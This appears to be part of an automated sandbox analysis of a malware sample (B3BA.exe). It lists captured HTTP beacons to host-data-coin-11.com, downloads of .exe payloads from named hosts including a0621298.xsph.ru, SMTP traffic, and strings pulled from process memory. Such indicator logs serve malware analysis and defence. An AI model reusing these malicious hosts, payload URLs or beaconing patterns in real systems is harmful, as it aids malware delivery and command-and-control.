                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kebbk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hoircbi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aglrl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ivytp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rbokhamk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://molmwvfdsj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uqmibnvyi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cmmwfel.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 242Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://voeiplb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 252Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xivyfkgciu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 147Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ydjicveig.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /45512.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mtcpl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: host-data-coin-11.com
                          Source: global trafficTCP traffic: 192.168.2.6:49788 -> 185.7.214.171:8080
                          Source: global trafficTCP traffic: 192.168.2.6:49816 -> 104.47.54.36:25
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/chat/video/videocalldownload.php
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                          Source: WerFault.exe, 00000012.00000002.519792531.0000000004AC0000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000002.528163156.0000023922500000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.708255454.000001D6DA28A000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                          Source: svchost.exe, 0000001C.00000002.527807876.0000023921EED000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.689092568.000001D6DA212000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmpString found in binary or memory: http://forms.rea
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmpString found in binary or memory: http://go.micros
                          Source: svchost.exe, 0000001C.00000003.496464238.0000023922591000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                          Source: B3BA.exe, 0000002A.00000002.663930181.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmpString found in binary or memory: http://service.r
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmpString found in binary or memory: http://support.a
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
